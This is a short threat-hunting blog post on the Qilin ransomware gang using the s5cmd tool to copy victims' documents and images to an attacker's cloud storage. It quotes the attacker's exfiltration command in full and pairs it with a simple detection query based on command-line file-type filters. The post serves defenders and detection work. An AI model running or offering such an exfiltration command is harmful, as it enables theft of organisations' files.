232. Qilin Ransomware Gang Abuses S5cmd for Data Exfiltration

Hello everyone!

Data exfiltration. Almost every ransomware-related incident includes this stage. And adversaries often experiment with various free tools to evade defenses. And today we're going to talk about the following technique: Transfer Data to Cloud Account (T1537).

Huntress noted that in a recent Qilin ransomware attack the adversary used s5cmd for exfiltration:

s5cmd  --credentials-file credentials cp --include "*.pdf" --include "*.png" --include "*.jpg" --include "*.jpeg" --include "*.xls" --include "*.xlsx" --include "*.tif" --include "*.zip" --include "*.doc" --include "*.docx" "[Folder]" s3://[Resource]

For detection, we can use, for example, popular file types:

event_type: "processcreatewin"

AND

cmdline: ("include" AND "pdf" AND "xls" AND "doc")

See you tomorrow!

Comments

Popular posts from this blog

082. Huniting for Malicious Browser Extensions

033. Free Google Threat Intelligence Course

163. A Curious Case of Iediagcmd.exe Abuse